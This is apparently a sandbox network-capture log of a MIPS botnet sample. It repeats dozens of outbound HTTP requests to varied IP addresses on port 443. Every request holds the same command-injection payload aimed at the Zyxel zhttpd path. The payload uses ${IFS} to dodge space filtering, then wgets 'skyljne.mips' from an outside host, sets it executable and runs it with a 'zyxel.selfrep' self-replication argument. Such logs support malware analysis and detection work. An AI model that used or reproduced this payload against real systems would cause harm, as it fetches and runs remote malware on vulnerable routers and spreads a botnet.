                                        Jan 14, 2024 16:18:45.470824957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4478192.168.2.1343912219.228.10.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470835924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4479192.168.2.1352342111.156.140.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470881939 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4480192.168.2.1349294180.133.111.90443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470931053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4481192.168.2.133505650.65.12.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.470973015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4482192.168.2.1337568197.109.174.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471026897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4483192.168.2.1358370178.167.145.222443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471069098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4484192.168.2.1352912118.111.218.249443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471113920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4485192.168.2.1354644205.112.95.9443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471138954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4486192.168.2.1341334199.195.10.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471198082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4487192.168.2.1356362144.185.143.63443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471241951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4488192.168.2.1347886216.79.35.169443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471281052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4489192.168.2.1335074105.89.214.74443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471314907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4490192.168.2.1341238133.56.175.80443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471349955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4491192.168.2.1347374141.217.105.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471359968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4492192.168.2.134803284.161.104.106443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471421957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4493192.168.2.1335876120.178.3.210443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471455097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4494192.168.2.134569039.250.139.202443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471481085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4495192.168.2.1334384101.20.107.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471554995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4496192.168.2.133536248.180.169.1443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471566916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4497192.168.2.134656041.89.86.84443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471613884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4498192.168.2.134141293.239.121.57443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471658945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4499192.168.2.134105837.0.220.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471709013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4500192.168.2.134454814.5.30.204443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471741915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4501192.168.2.135155020.216.179.213443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471777916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4502192.168.2.1337452199.22.126.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471812010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4503192.168.2.133620840.248.196.214443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471848965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4504192.168.2.1348952189.228.179.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471905947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4505192.168.2.134885450.210.46.124443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471923113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4506192.168.2.1353620199.249.243.105443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.471966982 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4507192.168.2.1341240156.9.213.73443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472029924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4508192.168.2.1351330103.152.35.60443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472069025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4509192.168.2.1349500101.193.88.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472125053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4510192.168.2.1333566173.164.217.140443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472162962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4511192.168.2.1345336136.149.158.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472158909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4512192.168.2.133948668.89.118.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472217083 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4513192.168.2.135179884.118.25.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472276926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4514192.168.2.135096837.32.219.187443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472320080 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4515192.168.2.1337922182.27.45.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472379923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4516192.168.2.1354788104.164.131.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472412109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4517192.168.2.1342696134.230.250.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472453117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4518192.168.2.1356926206.3.115.151443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472482920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4519192.168.2.1341442139.30.21.52443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472536087 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4520192.168.2.133730035.7.70.252443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472579956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4521192.168.2.1347026128.104.36.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472614050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4522192.168.2.135135642.192.137.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472662926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4523192.168.2.1334436180.139.160.72443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472711086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4524192.168.2.1354176147.133.4.186443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472753048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4525192.168.2.134284488.77.215.220443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472786903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4526192.168.2.1358628210.129.16.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472836971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4527192.168.2.135148286.42.131.212443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472882986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4528192.168.2.134140625.255.129.174443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472939968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4529192.168.2.1342500120.155.227.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.472989082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4530192.168.2.1346024140.211.19.191443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473032951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4531192.168.2.1349102153.67.245.10443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473087072 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4532192.168.2.133585050.199.98.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473119974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4533192.168.2.1354908195.27.151.216443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473175049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4534192.168.2.135763241.117.201.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473195076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4535192.168.2.1345914147.215.182.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473227024 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4536192.168.2.135393850.91.202.237443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473273039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4537192.168.2.1340856203.218.31.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473292112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4538192.168.2.1334924177.189.140.75443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473356962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4539192.168.2.1346508212.124.0.108443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:45.473377943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        4540192.168.2.1357726216.152.155.248443
                                        TimestampBytes transferredDirectionData
